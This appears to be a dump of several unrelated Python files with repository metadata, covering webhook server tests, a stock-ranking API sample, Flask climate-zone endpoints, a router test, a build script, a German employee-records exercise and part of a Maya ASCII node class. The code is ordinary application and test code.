assert not server.response_handlers["test"].done()
# We have no futures waiting for request id 'nonexistent', so nothing should
# happen.
server.response_queue.put(("nonexistent", None))
time.sleep(0.1)
assert not server.response_handlers["test"].done()
# If a response comes in for request id 'test', it should be removed from the
# response handlers dict.
server.response_queue.put(("test", None))
time.sleep(0.1)
assert "test" not in server.response_handlers
@pytest.mark.skip("Called from test_start since we can't parallellize this.")
def test_process_webhook(self, server):
"""Checks whether an incoming webhook post request is correctly handled."""
assert server.event_queue.empty()
assert server.response_queue.empty()
assert server.response_handlers == {}
async def send_request(data):
async with ClientSession() as session:
try:
response = await session.post(
f"{server.url}:{server.port}/hooks/test_hook",
json=data,
timeout=1,
)
return await response.json()
except asyncio.exceptions.TimeoutError:
return None
asyncio.run(send_request({"text": "Hello!"}))
# Verify that a WebHookEvent corresponding to our request was added to the
# event queue.
assert server.event_queue.qsize() == 1
event = server.event_queue.get_nowait()
assert event.webhook_id == "test_hook"
assert event.text == "Hello!"
# Since there is no MessageHandler, we have to signal the server ourselves
server.response_queue.put((event.request_id, NoResponse))
time.sleep(0.1)
# Upon receiving the NoResponse, the server should have emptied the response
# queue and handlers.
assert server.response_queue.empty()
assert server.response_handlers == {}
# Test whether the web response is correctly passed through, if there is one
response = {"text": "test response"}
def provide_response():
event = server.event_queue.get()
server.response_queue.put((event.request_id, response))
thread = threading.Thread(target=provide_response)
thread.start()
assert asyncio.run(send_request({"text": "Hello!"})) == response
| 37.257143
| 85
| 0.648773
| 467
| 3,912
| 5.310493
| 0.325482
| 0.073387
| 0.062097
| 0.041935
| 0.223387
| 0.2
| 0.16129
| 0.100806
| 0.100806
| 0.054032
| 0
| 0.005214
| 0.264571
| 3,912
| 104
| 86
| 37.615385
| 0.856795
| 0.204755
| 0
| 0.173913
| 0
| 0
| 0.079288
| 0.013592
| 0
| 0
| 0
| 0
| 0.217391
| 1
| 0.072464
| false
| 0
| 0.115942
| 0
| 0.231884
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a7b81a028bf0267f44066f902a91829b99db68
| 1,023
|
py
|
Python
|
sample/Python/kabusapi_ranking.py
|
HolyMartianEmpire/kabusapi
|
c88ee958c272fb6e1dfde9a256e138c5760ea545
|
[
"MIT"
] | 212
|
2020-08-20T09:10:35.000Z
|
2022-03-31T08:05:21.000Z
|
sample/Python/kabusapi_ranking.py
|
U2u14/kabusapi
|
e41d0c3fcbcf6a1164ace9eac1a4d93685012dcb
|
[
"MIT"
] | 496
|
2020-08-20T14:23:59.000Z
|
2022-03-31T23:59:09.000Z
|
sample/Python/kabusapi_ranking.py
|
U2u14/kabusapi
|
e41d0c3fcbcf6a1164ace9eac1a4d93685012dcb
|
[
"MIT"
] | 57
|
2020-08-20T10:40:07.000Z
|
2022-03-07T06:28:01.000Z
|
import urllib.request
import json
import pprint
url = 'http://localhost:18080/kabusapi/ranking' #?type=1&ExchangeDivision=ALL
params = { 'type': 15 } #type - 1: top gainers (default) 2: top losers 3: top trading volume 4: top trading value 5: tick count 6: surging trading volume 7: surging trading value 8: rising short margin balance 9: falling short margin balance 10: rising long margin balance 11: falling long margin balance 12: high margin ratio 13: low margin ratio 14: top gainers by sector 15: top losers by sector
params['ExchangeDivision'] = 'S' #ExchangeDivision - ALL: all markets (default) T: all TSE T1: TSE 1st Section T2: TSE 2nd Section TM: Mothers JQ: JASDAQ M: Nagoya SE FK: Fukuoka SE S: Sapporo SE
req = urllib.request.Request('{}?{}'.format(url, urllib.parse.urlencode(params)), method='GET')
req.add_header('Content-Type', 'application/json')
req.add_header('X-API-KEY', 'f2a3579e776f4b6b8015a96c8bdafdce')
try:
with urllib.request.urlopen(req) as res:
print(res.status, res.reason)
for header in res.getheaders():
print(header)
print()
content = json.loads(res.read())
pprint.pprint(content)
except urllib.error.HTTPError as e:
print(e)
content = json.loads(e.read())
pprint.pprint(content)
except Exception as e:
print(e)
| 39.346154
| 170
| 0.69697
| 152
| 1,023
| 4.677632
| 0.625
| 0.054852
| 0.033755
| 0.064698
| 0.081575
| 0
| 0
| 0
| 0
| 0
| 0
| 0.055556
| 0.155425
| 1,023
| 25
| 171
| 40.92
| 0.767361
| 0.256109
| 0
| 0.173913
| 0
| 0
| 0.180739
| 0.042216
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.130435
| 0
| 0.130435
| 0.347826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a95de29250fa6c98650b9aff0293a9f1a7b915
| 3,905
|
py
|
Python
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 7
|
2018-12-07T22:05:36.000Z
|
2020-05-03T03:20:50.000Z
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 220
|
2018-11-01T23:33:19.000Z
|
2021-12-02T21:06:38.000Z
|
sfa_api/zones.py
|
lboeman/solarforecastarbiter-api
|
9df598b5c638c3e36d0649e08e955b3ddc1b542d
|
[
"MIT"
] | 3
|
2018-10-31T20:55:07.000Z
|
2021-11-10T22:51:43.000Z
|
from flask import Blueprint, jsonify, make_response
from flask.views import MethodView
from sfa_api import spec, json
from sfa_api.schema import ZoneListSchema
from sfa_api.utils.storage import get_storage
from sfa_api.utils.request_handling import validate_latitude_longitude
class AllZonesView(MethodView):
def get(self, *args):
"""
---
summary: List climate zones
description: List all climate zones that the user has access to.
tags:
- Climate Zones
responses:
200:
description: A list of climate zones.
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/ZoneMetadata'
401:
$ref: '#/components/responses/401-Unauthorized'
"""
storage = get_storage()
zones = storage.list_zones()
return jsonify(ZoneListSchema(many=True).dump(zones))
class ZoneView(MethodView):
def get(self, zone, *args):
"""
---
summary: Get zone GeoJSON
description: Get the GeoJSON for a requested climate zone.
tags:
- Climate Zones
parameters:
- zone
responses:
200:
description: The GeoJSON definition for the climate zone
content:
application/geo+json:
schema:
type: object
401:
$ref: '#/components/responses/401-Unauthorized'
404:
$ref: '#/components/responses/404-NotFound'
"""
storage = get_storage()
geojson = storage.read_climate_zone(zone.replace('+', ' '))
response = make_response(json.dumps(geojson), 200)
response.mimetype = 'application/geo+json'
return response
class SearchZones(MethodView):
def get(self, *args):
"""
---
summary: Find zones
description: Find all zones that the given point falls within
tags:
- Climate Zones
parameters:
- latitude
- longitude
responses:
200:
description: Successfully retrieved zones.
content:
application/json:
schema:
type: array
items:
$ref: '#/components/schemas/ZoneMetadata'
400:
$ref: '#/components/responses/400-BadRequest'
401:
$ref: '#/components/responses/401-Unauthorized'
"""
lat, lon = validate_latitude_longitude()
storage = get_storage()
zones = storage.find_climate_zones(lat, lon)
return jsonify(ZoneListSchema(many=True).dump(zones))
spec.components.parameter(
'zone', 'path',
{
'schema': {
'type': 'string',
},
'description': "Climate zone name. Spaces may be replaced with +.",
'required': 'true',
'name': 'zone'
})
spec.components.parameter(
'latitude', 'query',
{
'name': 'latitude',
'required': True,
'description': 'The latitude (in degrees North) of the location.',
'schema': {
'type': 'float',
}
})
spec.components.parameter(
'longitude', 'query',
{
'name': 'longitude',
'required': True,
'description': 'The longitude (in degrees East of the Prime Meridian)'
' of the location.',
'schema': {
'type': 'float',
}
})
zone_blp = Blueprint(
'climatezones', 'climatezones', url_prefix='/climatezones',
)
zone_blp.add_url_rule('/', view_func=AllZonesView.as_view('all'))
zone_blp.add_url_rule('/<zone_str:zone>', view_func=ZoneView.as_view('single'))
zone_blp.add_url_rule('/search', view_func=SearchZones.as_view('search'))
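# Hypothetical registration sketch (the application object is an assumption):
#     from flask import Flask
#     app = Flask(__name__)
#     app.register_blueprint(zone_blp)  # serves the /climatezones/... routes
# Note that the '/<zone_str:zone>' rule relies on a custom 'zone_str' URL
# converter being registered on the application.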
| 29.141791
| 79
| 0.557746
| 374
| 3,905
| 5.721925
| 0.315508
| 0.039252
| 0.051402
| 0.028037
| 0.277103
| 0.226168
| 0.114953
| 0.073832
| 0.073832
| 0.073832
| 0
| 0.016135
| 0.333419
| 3,905
| 133
| 80
| 29.360902
| 0.805993
| 0.321639
| 0
| 0.327869
| 0
| 0
| 0.203421
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.098361
| 0
| 0.245902
| 0.032787
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34abfc5ba2b2f363e90afe9dd53efcac19d00daf
| 1,228
|
py
|
Python
|
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | 1
|
2022-03-17T07:22:23.000Z
|
2022-03-17T07:22:23.000Z
|
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/http_/test_adapters.py
|
matt-mercer/localstack
|
b69ba25e495c6ef889d33a050b216d0cd1035041
|
[
"Apache-2.0"
] | null | null | null |
import requests
from localstack.http import Response, Router
from localstack.http.adapters import RouterListener
from localstack.utils.testutil import proxy_server
class TestRouterListener:
def test_dispatching(self):
def endpoint(request, args):
resp = Response()
resp.set_json({"args": args})
return resp
router = Router()
router.add("/foo/<bar>", endpoint, methods=["GET"])
with proxy_server(RouterListener(router, fall_through=False)) as url:
response = requests.get(f"{url}/foo/ed")
assert response.ok
assert response.json() == {"args": {"bar": "ed"}}
# test with query
response = requests.get(f"{url}/foo/bar?hello=there")
assert response.ok
assert response.json() == {"args": {"bar": "bar"}}
# test invalid endpoint
response = requests.get(f"{url}/foo")
assert not response.ok
assert response.status_code == 404
# test non-allowed method
response = requests.post(f"{url}/foo/bar")
assert not response.ok
assert response.status_code == 405 # method not allowed
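# --- Illustrative sketch (appended; not part of the original test file) ---
# A hedged example of registering several methods on one rule, using only the
# Router/Response API exercised above; the rule and handler are hypothetical.
def _example_multi_method_router():
    def echo(request, args):
        resp = Response()
        resp.set_json({"method": request.method, "args": args})
        return resp
    router = Router()
    # Both GET and POST on /items/<item_id> dispatch to the same endpoint.
    router.add("/items/<item_id>", echo, methods=["GET", "POST"])
    return router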
| 33.189189
| 77
| 0.592834
| 137
| 1,228
| 5.262774
| 0.394161
| 0.116505
| 0.038835
| 0.133148
| 0.341193
| 0.341193
| 0.23301
| 0.23301
| 0
| 0
| 0
| 0.006904
| 0.292345
| 1,228
| 36
| 78
| 34.111111
| 0.822785
| 0.065147
| 0
| 0.16
| 0
| 0
| 0.083115
| 0.021872
| 0
| 0
| 0
| 0
| 0.32
| 1
| 0.08
| false
| 0
| 0.16
| 0
| 0.32
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ac4b2375450822de672fe9deedac50930b777e
| 647
|
py
|
Python
|
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
setup.py
|
ZaneColeRiley/ArcherProject
|
7d9ecf4953e3ea8ce3577321449549743eada34e
|
[
"MIT"
] | null | null | null |
from cx_Freeze import setup, Executable
import sys
base = None
if sys.platform == "win32":
base = "Win32GUI"
executables = [Executable("Archer.py", base=base, icon="favicon.ico")]
setup(name="Archer",
version="1.0.0",
options={"build_exe": {"packages": ["tkinter", "mysql", "PIL", "time", "requests", "os", "smtplib", "datetime", "pyAesCrypt"], "include_files": ["Screen_image.jpg", "favicon.ico", "Admin_screen.jpg", "Screen_image_small.jpg", "Journal.jpg", "db.sqlite3"]}},
description="",
executables=executables, requires=['requests', 'PIL', 'mysql', "smtplib", "tkinter", "time", "pyAesCrypt"])
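# Illustrative note (appended): with cx_Freeze installed, the frozen
# executable defined above is typically built with:
#   python setup.py build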
| 40.4375
| 264
| 0.638331
| 74
| 647
| 5.486486
| 0.648649
| 0.049261
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014572
| 0.151468
| 647
| 15
| 265
| 43.133333
| 0.724954
| 0
| 0
| 0
| 0
| 0
| 0.408228
| 0.03481
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34ac94f8711db1745f63a3c064eaa86f3dde0de5
| 2,772
|
py
|
Python
|
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | 1
|
2022-03-23T09:40:39.000Z
|
2022-03-23T09:40:39.000Z
|
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
WiSe-2122/Uebung-11/Gruppe-C/U11-A1.py
|
jonasrdt/Wirtschaftsinformatik2
|
30d5d896808b98664c55cb6fbb3b30a7f1904d9f
|
[
"MIT"
] | null | null | null |
# Exercise 11 - Task 1
# Employee card file (Mitarbeiter-Kartei)
# Provided by M. Drews in the 2021/22 winter semester
# Functions
def trenner(anzahl_striche):
for i in range(anzahl_striche):
print("-", end="")
print()
def fehler():
print("\nFehler: Bitte geben Sie nur Zahlen an, die zur Auswahl stehen.")
def formular():
global vorname, nachname, geburtsort
vorname = input("> Vorname: ")
nachname = input("> Nachname: ")
geburtsort = input("> Geburtsort: ")
def suche():
global index
suche = input("Suchbegriff (Nachname eingeben): ")
index = next((i for i, item in enumerate(ma_kartei) if item["Nachname"] == suche), None)
def eintrag_neu():
print("\nBitte fügen Sie einen neuen Eintrag zur Mitarbeiter-Kartei hinzu: ")
formular()
gueltige_eingabe = False
while not gueltige_eingabe:
try:
auswahl = int(input("\n(1) Speichern (2) Abbrechen\n"))
if auswahl == 1:
gueltige_eingabe = True
eintrag = {"Vorname": vorname,"Nachname": nachname,"Geburtsort": geburtsort}
ma_kartei.append(eintrag)
print("Ihr Eintrag wurde gespeichert und der Kartei hinzugefügt.")
trenner(80)
elif auswahl == 2:
gueltige_eingabe = True
        except ValueError:
            fehler()
def eintrag_bearbeiten():
    print("Welchen Eintrag möchten Sie bearbeiten?")
    suche()
    # Guard added: suche() leaves index as None when no entry matches.
    if index is None:
        print("Kein Eintrag mit diesem Nachnamen gefunden.")
        return
    print("\nBitte überschreiben Sie den alten Eintrag:")
    formular()
    ma_kartei[index] = {"Vorname": vorname, "Nachname": nachname, "Geburtsort": geburtsort}
    print("Ihr Eintrag wurde gespeichert und aktualisiert.")
    trenner(80)
def eintrag_loeschen():
    print("Welchen Eintrag möchten Sie löschen?")
    suche()
    # Guard added: suche() leaves index as None when no entry matches.
    if index is None:
        print("Kein Eintrag mit diesem Nachnamen gefunden.")
        return
    print("\nFolgender Eintrag wurde gelöscht:")
    print(ma_kartei[index])
    ma_kartei.pop(index)
# Main program flow
print("\n")
trenner(120)
print("Mitarbeiter-Kartei")
trenner(120)
trenner(120)
ma_kartei = []
programm = True
while programm:
print("Was möchten Sie tun?")
gueltige_eingabe = False
while not gueltige_eingabe:
try:
auswahl = int(input("\n(1) Eintrag hinzufügen\n(2) Eintrag bearbeiten\n(3) Eintrag löschen\n(4) Kartei anzeigen\n"))
if auswahl == 1:
gueltige_eingabe = True
eintrag_neu()
elif auswahl == 2:
gueltige_eingabe = True
eintrag_bearbeiten()
elif auswahl == 3:
gueltige_eingabe = True
eintrag_loeschen()
elif auswahl == 4:
gueltige_eingabe = True
print(ma_kartei)
trenner(80)
        except ValueError:
            fehler()
| 28.875
| 128
| 0.599206
| 298
| 2,772
| 5.489933
| 0.342282
| 0.091687
| 0.069682
| 0.06357
| 0.333741
| 0.298289
| 0.199267
| 0.199267
| 0.154034
| 0.154034
| 0
| 0.018414
| 0.294733
| 2,772
| 95
| 129
| 29.178947
| 0.818414
| 0.042929
| 0
| 0.432432
| 0
| 0.013514
| 0.263317
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094595
| false
| 0
| 0
| 0
| 0.094595
| 0.202703
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34af79c82e2f03fa8bacfe2aa4a2b6da7ce9ee22
| 20,230
|
py
|
Python
|
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | 1
|
2021-09-08T00:51:52.000Z
|
2021-09-08T00:51:52.000Z
|
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | null | null | null |
asciinode.py
|
bhsingleton/mason
|
9a14cdc758b7ef76e53d4ef9d30045834d6c17ef
|
[
"MIT"
] | null | null | null |
import maya.api.OpenMaya as om
from . import asciitreemixin, asciiattribute, asciiplug
from .collections import hashtable, weakreflist, notifylist
import logging
logging.basicConfig()
log = logging.getLogger(__name__)
log.setLevel(logging.INFO)
class AsciiNode(asciitreemixin.AsciiTreeMixin):
"""
Overload of AsciiTreeMixin used to interface with scene nodes.
"""
__slots__ = (
'_scene',
'_name',
'_namespace',
'_uuid',
'_type',
'_parent',
'_children',
'_locked',
'_default',
'_attributes',
'_plugs',
'_database',
'_connections'
)
__attributes__ = {} # Used for static attributes
def __init__(self, typeName, **kwargs):
"""
Private method called after a new instance is created.
:type typeName: str
:keyword scene: asciiscene.AsciiScene
:rtype: None
"""
# Call parent method
#
super(AsciiNode, self).__init__()
# Declare private variables
#
self._scene = kwargs.get('scene', self.nullWeakReference)
self._name = ''
self._namespace = ''
self._uuid = ''
self._type = typeName
self._parent = self.nullWeakReference
self._children = notifylist.NotifyList(cls=weakreflist.WeakRefList)
self._locked = False
self._attributes = hashtable.HashTable() # Used for dynamic attributes
self._plugs = hashtable.HashTable()
        self._connections = []
        self._database = None  # declared in __slots__ but never assigned elsewhere; initialized so the `database` property is safe
        self._default = kwargs.get('default', False)
# Setup child notifies
#
self._children.addCallback('itemAdded', self.childAdded)
self._children.addCallback('itemRemoved', self.childRemoved)
# Declare public variables
#
self.parent = kwargs.get('parent', None)
self.name = kwargs.get('name', '')
self.namespace = kwargs.get('namespace', '')
self.uuid = kwargs.get('uuid', om.MUuid().generate().asString())
# Initialize node attributes
#
self.initialize()
def __str__(self):
"""
Private method that returns a string representation of this instance.
:rtype: str
"""
return f'<{self.__class__.__module__}.{self.__class__.__name__} object: {self.absoluteName()}>'
def __getitem__(self, key):
"""
Private method that returns the plug associated with the supplied key.
:type key: str
:rtype: asciiplug.AsciiPlug
"""
return self.findPlug(key)
def __dumps__(self):
"""
Returns a list of command line strings that can be serialized.
:rtype: list[str]
"""
# Evaluate which commands to concatenate
#
commands = []
if self.isDefaultNode:
commands.append(self.getSelectCmd())
else:
commands.append(self.getCreateNodeCmd())
commands.append(self.getRenameCmd())
# Concatenate lockNode command
# But only if the node has actually been locked!
#
if self.isLocked:
commands.append(self.getLockNodeCmd())
# Concatenate attribute related commands
#
commands.extend(self.getAddAttrCmds())
commands.extend(self.getSetAttrCmds())
return commands
@property
def scene(self):
"""
Returns the scene this object is derived from.
:rtype: mason.asciiscene.AsciiScene
"""
return self._scene()
@property
def name(self):
"""
Getter method that returns the name of this node.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Setter method updates the name of this node.
:type name: str
:rtype: None
"""
# Check for redundancy
#
newName = self.stripAll(name)
oldName = self._name
if newName != oldName:
self._name = newName
self.nameChanged(oldName, newName)
def nameChanged(self, oldName, newName):
"""
Callback method for any name changes made to this node.
:type oldName: str
:type newName: str
:rtype: None
"""
# Remove previous name from registry
#
absoluteName = f'{self.namespace}:{oldName}'
hashCode = self.scene.registry.names.get(absoluteName, None)
if hashCode == self.hashCode():
del self.scene.registry.names[absoluteName]
# Append new name to registry
#
absoluteName = f'{self.namespace}:{newName}'
self.scene.registry.names[absoluteName] = self.hashCode()
@property
def namespace(self):
"""
Getter method that returns the namespace this node belongs to.
:rtype: str
"""
return self._namespace
@namespace.setter
def namespace(self, namespace):
"""
Setter method updates the namespace this node belongs to.
:type namespace: str
:rtype: None
"""
# Check for redundancy
#
oldNamespace = self._namespace
newNamespace = '' if namespace == ':' else namespace
if newNamespace != oldNamespace:
self._namespace = newNamespace
self.namespaceChanged(oldNamespace, newNamespace)
def namespaceChanged(self, oldNamespace, newNamespace):
"""
Callback method for any namespace changes made to this node.
:type oldNamespace: str
:type newNamespace: str
:rtype: None
"""
# Remove previous name from registry
#
absoluteName = f'{oldNamespace}:{self.name}'
hashCode = self.scene.registry.names.get(absoluteName, None)
if hashCode == self.hashCode():
del self.scene.registry.names[absoluteName]
# Append new name to registry
#
absoluteName = f'{newNamespace}:{self.name}'
self.scene.registry.names[absoluteName] = self.hashCode()
def absoluteName(self):
"""
Returns the bare minimum required to be a unique name.
:rtype: str
"""
if len(self.namespace) > 0:
return f'{self.namespace}:{self.name}'
else:
return self.name
@property
def parent(self):
"""
Getter method that returns the parent for this object.
:rtype: AsciiNode
"""
return self._parent()
@parent.setter
def parent(self, parent):
"""
Setter method that updates the parent for this object.
:type parent: AsciiNode
:rtype: None
"""
# Check for redundancy
#
if parent is self.parent:
log.debug(f'{self} is already parented to: {parent}')
return
# Check for none type
#
oldParent = self.parent
if isinstance(parent, AsciiNode):
self._parent = parent.weakReference()
elif isinstance(parent, str):
self.parent = self.scene.registry.getNodeByName(parent)
elif parent is None:
self._parent = self.nullWeakReference
else:
raise TypeError(f'parent.setter() expects an AsciiNode ({type(parent).__name__} given)!')
# Cleanup any old references
#
self.parentChanged(oldParent, parent)
def parentChanged(self, oldParent, newParent):
"""
Callback method that cleans up any parent/child references.
:type oldParent: AsciiNode
:type newParent: AsciiNode
:rtype: None
"""
# Remove self from former parent
#
if oldParent is not None:
oldParent.children.remove(self)
# Append self to new parent
#
if newParent is not None:
newParent.children.appendIfUnique(self)
@property
def children(self):
"""
Getter method that returns the children belonging to this object.
:rtype: weakreflist.WeakRefList
"""
return self._children
def childAdded(self, index, child):
"""
Adds a reference to this object to the supplied child.
:type index: int
:type child: AsciiNode
:rtype: None
"""
if child.parent is not self:
child.parent = self
def childRemoved(self, child):
"""
Removes the reference of this object from the supplied child.
:type child: AsciiNode
:rtype: None
"""
child.parent = None
@property
def type(self):
"""
Getter method that returns the name of this node type.
:rtype: str
"""
return self._type
@property
def uuid(self):
"""
Getter method that returns the UUID for this node.
:rtype: str
"""
return self._uuid
@uuid.setter
def uuid(self, uuid):
"""
Setter method that updates the UUID for this node.
:type uuid: str
:rtype: None
"""
# Check for redundancy
#
newUUID = self.scene.registry.generateUUID(uuid)
oldUUID = self._uuid
if newUUID != oldUUID:
self._uuid = newUUID
self.uuidChanged(oldUUID, newUUID)
def uuidChanged(self, oldUUID, newUUID):
"""
        Callback method for any UUID changes made to this node.
:type oldUUID: str
:type newUUID: str
:rtype: None
"""
# Remove previous uuid from registry
#
hashCode = self.scene.registry.uuids.get(oldUUID, None)
if hashCode == self.hashCode():
del self.scene.registry.uuids[oldUUID]
# Append new uuid to registry
#
self.scene.registry.uuids[newUUID] = self.hashCode()
@property
def isLocked(self):
"""
Getter method that returns the lock state of this node.
:rtype: int
"""
return self._locked
@isLocked.setter
def isLocked(self, locked):
"""
Setter method that updates the lock state of this node.
:type locked: bool
:rtype: None
"""
self._locked = bool(locked)
@property
def isDefaultNode(self):
"""
Getter method that evaluates whether this is a default node.
:rtype: bool
"""
return self._default
def initialize(self):
"""
Initializes the attributes and plugs for this node.
:rtype: None
"""
# Check if static attributes exist
# If not then go ahead and initialize them
#
attributes = self.__attributes__.get(self.type)
if attributes is None:
attributes = asciiattribute.listPlugin(self.type)
self.__attributes__[self.type] = attributes
@property
def database(self):
"""
Getter method that returns the database for this node.
:rtype: asciidatabase.AsciiDatabase
"""
return self._database
@property
def plugs(self):
"""
Getter method that returns the plugs that are currently in use.
:rtype: hashtable.HashTable
"""
return self._plugs
def iterTopLevelPlugs(self):
"""
Iterates through all of the top-level plugs.
Please note that plugs are created on demand so don't expect a complete list from this generator!
:rtype: iter
"""
# Iterate through attributes
#
for attribute in self.listAttr(fromPlugin=True, userDefined=True).values():
            # Skip attributes that are not top-level (i.e. that have a parent)
#
if attribute.parent is not None:
continue
# Yield associated plug
#
plug = self._plugs.get(attribute.shortName, None)
if plug is not None:
yield plug
else:
continue
def dagPath(self):
"""
Returns a dag path for this node.
:rtype: str
"""
if self.parent is not None:
return '|'.join([x.absoluteName() for x in self.trace()])
else:
return self.name
def attribute(self, name):
"""
Returns an ascii attribute with the given name.
:type name: str
:rtype: asciiattribute.AsciiAttribute
"""
return self.listAttr(fromPlugin=True, userDefined=True).get(name, None)
def listAttr(self, fromPlugin=False, userDefined=False):
"""
Returns a list of attributes derived from this node.
:type fromPlugin: bool
:type userDefined: bool
:rtype: hashtable.HashTable
"""
# Check if plugin defined attributes should be returned
#
attributes = hashtable.HashTable()
if fromPlugin:
attributes.update(self.__class__.__attributes__[self.type])
# Check if user defined attributes should be returned
#
if userDefined:
attributes.update(self._attributes)
return attributes
def addAttr(self, *args, **kwargs):
"""
Adds a dynamic attribute to this node.
This function accepts two different sets of arguments.
You can either supply a fully formed AsciiAttribute.
Or you can pass all of the keywords required to create one.
:rtype: None
"""
# Check number of arguments
#
numArgs = len(args)
numKwargs = len(kwargs)
if numArgs == 1:
# Store reference to attribute
#
attribute = args[0]
self._attributes[attribute.shortName] = attribute
self._attributes[attribute.longName] = attribute
elif numKwargs > 0:
# Create new attribute from kwargs
#
attribute = asciiattribute.AsciiAttribute(**kwargs)
self.addAttr(attribute)
else:
raise TypeError(f'addAttr() expects 1 argument ({numArgs} given)!')
def setAttr(self, plug, value):
"""
Assigns the supplied value to the given plug.
:type plug: Union[str, asciiplug.AsciiPlug]
:type value: Any
:rtype: None
"""
# Check plug type
#
if isinstance(plug, str):
plug = self.findPlug(plug)
# Assign value to plug
#
plug.setValue(value)
def connectAttr(self, source, destination):
"""
Connects the two supplied plugs together.
:type source: Union[str, asciiplug.AsciiPlug]
:type destination: Union[str, asciiplug.AsciiPlug]
:rtype: None
"""
# Check source type
#
if isinstance(source, str):
source = self.findPlug(source)
# Check destination type
#
if isinstance(destination, str):
destination = self.findPlug(destination)
# Connect plugs
#
source.connect(destination)
def findPlugs(self, path):
"""
Returns a list of plugs from the supplied string path.
:type path: str
:rtype: list[asciiplug.AsciiPlug]
"""
return asciiplug.AsciiPlugPath(f'{self.absoluteName()}.{path}', scene=self.scene).evaluate()
def findPlug(self, path):
"""
Returns the plug associated with the given name.
If more than one plug is found then a type error is raised.
:type path: str
:rtype: asciiplug.AsciiPlug
"""
plugs = self.findPlugs(path)
numPlugs = len(plugs)
if numPlugs == 0:
return None
elif numPlugs == 1:
return plugs[0]
else:
raise TypeError('findPlug() multiple plugs found!')
def legalConnection(self, plug, otherPlug):
"""
Evaluates whether or not the connection between these two plugs is valid.
TODO: Implement this behaviour!
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: bool
"""
return True
def connectionMade(self, plug, otherPlug):
"""
Callback method for any connection changes made to this node.
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: None
"""
self._connections.append(otherPlug.weakReference())
def legalDisconnection(self, plug, otherPlug):
"""
Evaluates whether or not the disconnection between these two plugs is valid.
TODO: Implement this behaviour!
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: bool
"""
return True
def connectionBroken(self, plug, otherPlug):
"""
Callback method for any disconnection changes made to this node.
:type plug: asciiplug.AsciiPlug
:type otherPlug: asciiplug.AsciiPlug
:rtype: None
"""
self._connections.remove(otherPlug.weakReference())
def getCreateNodeCmd(self):
"""
Returns a command string that can create this node.
:rtype: str
"""
# Check if node has parent
#
if self.parent is not None:
return f'createNode {self.type} -s -n "{self.absoluteName()}" -p "{self.parent.absoluteName()}";'
else:
